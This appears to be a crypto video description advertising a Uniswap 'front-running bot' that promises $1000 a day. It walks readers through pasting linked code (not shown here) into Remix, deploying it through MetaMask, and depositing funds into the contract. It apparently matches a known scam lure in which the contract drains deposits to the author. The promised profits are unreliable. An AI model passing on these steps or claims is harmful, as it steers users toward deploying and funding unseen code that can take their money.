How to make $1000/DAY on UniSwap

Web3 Ape

How to make $1000/DAY on UniSwap

Uniswap is a decentralized permissionless exchange that allows users to trade ERC-20 tokens directly. If you trade crypto on Uniswap, 1inch or any other decentralized exchange (DEX), then you need to know about front-running bots. In this video, we see a front running bot, performing buy/sell actions without having to go through the typical transactional methods. You can PM me here: e 1. Download MetaMask: l 2. Access Remix: / 3. Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol” 4. Paste THIS code in Remix: 4 5. Move to the “Solidity Compiler” tab, select version “0.6.6” and then “Compile” it 6. Move to the “Deploy” tab, select “Injected Web 3” environment and then “Deploy” it. After the transaction is confirmed, it’s your own BOT now 7. Deposit funds to exact your bot contract address 8. After your transaction was confirmed, Start the bot by clicking the “start” button. Withdraw anytime by clicking the “withdrawal” button